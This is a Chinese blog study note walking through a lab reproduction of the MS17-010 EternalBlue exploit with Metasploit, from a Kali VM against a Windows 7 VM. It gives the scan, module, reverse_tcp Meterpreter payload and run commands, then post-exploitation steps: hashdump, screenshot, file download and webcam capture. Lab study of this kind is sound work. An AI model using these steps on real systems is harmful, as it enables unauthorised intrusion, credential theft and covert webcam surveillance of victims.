首页 > 其他分享 >网络安全笔记DAY01

网络安全笔记DAY01

时间:2023-10-14 16:02:07浏览次数:31  
标签:网络安全 set 查看 步骤 DAY01 笔记 010 命令 设置

实战:MS17-010(永恒之蓝)漏洞测试实战

背景:2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。 恶意代码会扫描开放445文件共享端口的Windows机器,无需用户任何操作,只要开机上网,不法分子就能在电脑和服务器中植入勒索软件、远程控制等恶意程序。


使用软件:Vmware Workstation 17

使用机:Kali

靶机环境:Win7

复现步骤:

步骤1:查看受害者的机器是否存活 nmap (同一网段IP地址)(1/24)可加可不加 (使用机与靶机注要保持同一网段 使用NAT,看相互是否ping通)    

全面扫描 nmap -T4 -A -v -Pn (IP地址) 1/24    

网络安全笔记DAY01_IP

步骤2:启动msf(metasploit) 命令为msfconsole  

网络安全笔记DAY01_IP_02


步骤3 搜索漏洞 命令为:search ms17-010          

查看必备参数是否填写完。  

看到 RHOSTS(目标)空缺   设置目标并且看是否有MS17-010目标 

网络安全笔记DAY01_NAT_03


网络安全笔记DAY01_Windows_04


步骤4 使用序号为1的模块

命令:use 0    

网络安全笔记DAY01_Windows_05


看到 RHOSTS(目标)空缺

网络安全笔记DAY01_NAT_06


步骤5  查看设置负载  

因为 看到提示 no payload 所以要设置负载

查看  设置负载

命令:set payload windows/x64/meterpreter/reverse_tcp    

网络安全笔记DAY01_IP_07

网络安全笔记DAY01_IP_08

步骤6 设置靶机IP

命令:set rhost  

步骤7 设置使用机IP

命令:set lhost      

网络安全笔记DAY01_Windows_09

输入run 结果会显示WIN,表示拿到权限  

网络安全笔记DAY01_Windows_10

发现会存在一定乱码,是编码的问题    

网络安全笔记DAY01_NAT_11

使用命令chcp 65001 补充: 936 =GBK(显示中文用的) 437=MS-DOS的默认字符集 65001=UTF-8

网络安全笔记DAY01_Windows_12

步骤8 屏幕快照     上传到C盘    

网络安全笔记DAY01_Windows_13


网络安全笔记DAY01_IP_14

看到快照了    从目标机中下载文件    

网络安全笔记DAY01_Windows_15

其他部分:

查看拿到的权限,为管理员

命令 getuid—— 

网络安全笔记DAY01_IP_16

hashdump获取密码md5码      

网络安全笔记DAY01_IP_17

网络安全笔记DAY01_IP_18

其他命令:

webcam_list ——查看摄像头

webcam_snap——通过摄像头拍照

webcam_stream——通过摄像头开启视频

注:本文内容仅为学习分享,谨记网络安全法规,维护国家网络安全。



标签:网络安全,set,查看,步骤,DAY01,笔记,010,命令,设置
From: https://blog.51cto.com/u_13664395/7862122

相关文章

  • 学习笔记5(第十一章)
    一、知识点归纳(一)知识点整理第十一章EXT2文件系统EXT2是一个完全与LINUX兼容的文件系统,这一章在简要EXT2-EXT4的当前状况之后,又用编程示例各种数据结构与如何进行相关的实现还展示了如何通过虚拟磁盘mount-root来构建基本文件系统,将文件系统的实现分为了三个级别并分别介绍。......
  • 20211325 2023-2024-1 《信息安全系统设计与实现(上)》第五周学习笔记
    202113252023-2024-1《信息安全系统设计与实现(上)》第五周学习笔记一、任务要求自学教材第11章,提交学习笔记(10分),评分标准如下:1.知识点归纳以及自己最有收获的内容,选择至少2个知识点利用chatgpt等工具进行苏格拉底挑战,并提交过程截图,提示过程参考下面内容(4分)“我在学***X知......
  • openGauss学习笔记-99 openGauss 数据库管理-管理数据库安全-客户端接入认证之配置文
    openGauss学习笔记-99openGauss数据库管理-管理数据库安全-客户端接入认证之配置文件参考99.1参数说明表1参数说明参数名称描述取值范围local表示这条记录只接受通过Unix域套接字进行的连接。没有这种类型的记录,就不允许Unix域套接字的连接。只有在从服务器本机......
  • 【科研00】【论文阅读】【略读笔记】TransUnet
    目录0.引言1.链接Link2.阅读Read2.1.结构Structure2.2.编码Encoder2.2.1.卷积CNN2.2.2.变换Transformer2.3.解码Decoder3.优势Advantage4.想法Think0.引言  想尝试TransUnet,先稍微的了解了一下结构。  如果阅读到这篇文章,请略过,本文仅是个人的随笔。......
  • [14/10/23] 微积分学习笔记(查漏补缺ver)
    水个博客。。。好久没上了xxx下面是正文--微积分学习过程中的乱七八糟的数学手册1.致密性定理:任何有界数列必定有收敛的子列。证明思路:由于对于一个任意给定的有界数列\(\{a_n\}\),有唯一数列\(\{b_n\}=\{-a_n\}\)与之对应,则很容易想到只需证明存在单增(或单减,因为......
  • hadoop集群 大数据项目实战_电信用户行为分析_day01
    上图是相关配置的要求,主要创建了四个虚拟系统,有三台虚拟机搭建hadoop集群,一台作为业务系统。涉及到相关的Linux指令有::setnu[显示行号] :6[到第6行 shift+G跳到最后一行 进入vi指令后查找相关东西/(你需要查找的东西)1.配置环境、第一步设置网络参数,设置静态网络目录......
  • 十一章学习笔记
    章节概述本章内容为EXT2文件系统,作为Linux系统最传统的磁盘文件系统,EXT2文件系统是理解Linux下文件系统的关键。本章介绍了EXT2在Linux系统中的历史地位,以及其后的EXT3、EXT4文件系统的当前应用状况;展示了EXT2文件系统的数据结构以及对EXT2文件树系统的遍历;介绍了如何......
  • [刷题笔记] Luogu P5658 [CSP-S 2019] 括号树
    Description给定一棵树,树的每个节点都有一个左括号或者右括号,求从根节点到每个点简单路径上的括号序列上合法的子括号序列数。Analysis显然树形dp。考虑如何设计状态,定义\(f_i\)表示从root到\(i\)节点的字串合法数量。考虑转移,如果当前的括号为左括号,我们无法和前面的......
  • 大一上学期程序设计笔记_C++
    罕见的数据类型枚举类型   enum枚举类型名T{Sunday=1,Monday,Tuesday,Wednesday,Thursday,Friday,Saturday};            枚举类型名T  变量表枚举类型只能进行赋值和比较运算。不能把整数赋给枚举型变量。枚举内部的元素会从0开始连续编码。类......
  • 【技术积累】《MongoDB实战》笔记(1)
    《MongoDB实战》笔记第一章为现代Web而生的数据库特性mongodb适合做水平扩展的数据库。mongodb把文档组织成集合,无schema。索引mongodb的二级索引是B树实现。每个集合最多可以创建64个索引,副本集mongodb通过副本集(replicationset)的结构提供了复制功能。副本集有一个主......